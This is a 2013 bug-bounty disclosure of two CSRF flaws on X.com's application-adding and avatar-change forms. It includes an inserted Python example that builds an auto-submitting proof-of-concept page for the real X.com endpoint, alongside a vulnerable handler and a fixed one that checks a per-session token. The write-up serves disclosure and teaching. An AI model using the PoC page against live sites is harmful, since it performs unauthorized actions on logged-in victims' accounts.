July 19, 2013
The X.com bug bounty runs under the PayPal bug bounty program, and I got paid.
Bug 1: Add New Application
X.com lets a user add a new application from the account settings page. The form that does this carries no CSRF token, so any page the logged-in victim visits can submit it on their behalf with the session cookie attached, and an unauthorized application is silently added to the victim's account.
CSRF Vulnerable URL : https://www.x.com/user/my-account/applications/new
To reproduce this vulnerability I have attached a proof of concept.
Direct Download Link of POC :
Bug 2: Change User's Avatar
X.com allows a user to change their default avatar.
I found that the CSRF token is also missing in the avatar change module, so it can be used to forcibly set a user's default avatar.
<input type="submit" name="submit">
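Both bugs share the same root cause and the same fix, so one added example (not part of the original post or of X.com's code) covers both. It builds the kind of auto-submitting PoC page used for a CSRF test, then shows a minimal request handler with the bug beside the same handler protected by a synchronizer token. The action URL is the one named above; the form field names (app_name, callback_url), the session layout and the handler signatures are assumptions made for illustration.

```python
import hmac
import secrets
from html import escape

# --- Attacker side: an auto-submitting CSRF proof-of-concept page ---------
# Field names below are ASSUMED for illustration; they are not x.com's.
def csrf_poc_html(action, fields):
    """Return an HTML page that POSTs `fields` to `action` as soon as it loads.

    A victim who is logged in and opens this page sends the request with
    their session cookie attached; without a CSRF token the server cannot
    tell it apart from a submission of its own form."""
    inputs = "\n".join(
        f'    <input type="hidden" name="{escape(k)}" value="{escape(v)}">'
        for k, v in fields.items()
    )
    return (
        '<html><body onload="document.forms[0].submit()">\n'
        f'  <form method="POST" action="{escape(action)}">\n'
        f"{inputs}\n"
        '    <input type="submit" name="submit">\n'
        "  </form>\n"
        "</body></html>"
    )

# --- Server side: vulnerable handler beside the fixed one ----------------
# `session` stands in for the victim's server-side session (a dict here),
# `form` for the POSTed fields. Both handlers return (status, message).

def add_application_vulnerable(session, form):
    """Mirrors the bug: the only check is that the user is logged in."""
    if not session.get("user"):
        return 403, "login required"
    session.setdefault("applications", []).append(form["app_name"])
    return 200, "application added"

def issue_csrf_token(session):
    """Synchronizer token: a random per-session secret that the server
    embeds as a hidden field in every state-changing form. A cross-origin
    page cannot read it, so it cannot include it in a forged request."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def add_application_fixed(session, form):
    """Same handler with the token check the original form lacked."""
    if not session.get("user"):
        return 403, "login required"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    # compare_digest avoids leaking the token through timing differences
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403, "invalid or missing CSRF token"
    session.setdefault("applications", []).append(form["app_name"])
    return 200, "application added"

def demo():
    """Constructed scenario: the attacker's page carries no token, so the
    forged request succeeds only against the vulnerable handler."""
    victim = {"user": "alice"}
    issue_csrf_token(victim)
    forged = {"app_name": "evil-app", "callback_url": "https://attacker.example/cb"}
    vuln = add_application_vulnerable(victim, forged)
    fixed = add_application_fixed(victim, forged)
    legit = add_application_fixed(victim, {**forged, "csrf_token": victim["csrf_token"]})
    return vuln, fixed, legit

if __name__ == "__main__":
    print(csrf_poc_html("https://www.x.com/user/my-account/applications/new",
                        {"app_name": "evil-app", "callback_url": "https://attacker.example/cb"}))
    print(demo())
```

The same token check, applied to the avatar change form, closes Bug 2; the PoC generator produces an equivalent page for it once the avatar endpoint and its field names are known. A SameSite cookie attribute is a useful second layer, but the per-form token is the fix the page's two bugs call for.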
Thank you PayPal & X.com for running such a good program. – g4h